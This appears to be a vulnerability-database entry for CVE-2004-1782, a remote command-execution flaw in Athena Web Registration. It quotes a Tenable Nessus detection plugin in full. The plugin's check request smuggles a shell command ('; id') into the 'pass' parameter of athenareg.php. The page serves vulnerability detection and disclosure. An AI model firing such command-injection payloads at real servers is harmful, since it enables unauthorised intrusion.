Vulnerabilities > CVE-2004-1782 - Unspecified vulnerability in David Maciejak Athena web Registration

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
david-maciejak
nessus
exploit available

Summary

athenareg.php in Athena Web Registration allows remote attackers to execute arbitrary commands via shell metacharacters in the pass parameter.

Vulnerable Configurations

Part Description Count
Application
David_Maciejak
1

Exploit-Db

descriptionAthena Web Registration Remote Command Execution Vulnerability. CVE-2004-1782. Webapps exploit for php platform
idEDB-ID:23513
last seen2016-02-02
modified2004-01-02
published2004-01-02
reporterPeter Kieser
sourcehttps://www.exploit-db.com/download/23513/
titleAthena Web Registration Remote Command Execution Vulnerability

Nessus

NASL familyCGI abuses
NASL idATHENA_WEB_REMOTE_CMD_EXEC.NASL
descriptionThe remote host is running Athena Web server. The remote version of this software allows for execution of arbitrary commands through the script
last seen2020-06-01
modified2020-06-02
plugin id18376
published2005-05-27
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/18376
titleAthena Web Registration athenareg.php pass Parameter Command Execution
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(18376);
 script_version("1.21");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 script_cve_id("CVE-2004-1782");
 script_bugtraq_id(9349);
  
 script_name(english:"Athena Web Registration athenareg.php pass Parameter Command Execution");
 script_summary(english:"Checks for Athena Web Registration remote command execution flaw");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows arbitrary
command execution." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Athena Web server. 

The remote version of this software allows for execution of arbitrary
commands through the script 'athenareg.php'.  A malicious user could
exploit this issue to execute arbitrary commands on the remote host." );
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/05/27");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/01/02");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2005-2020 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");

 script_dependencie("http_version.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 script_require_keys("www/PHP");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80, embedded:TRUE);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);


http_check_remote_code_ka (
			check_request:"/athenareg.php?pass=%20;id",
			check_result:"uid=[0-9]+.*gid=[0-9]+.*",
			command:"id",
			port:port
			);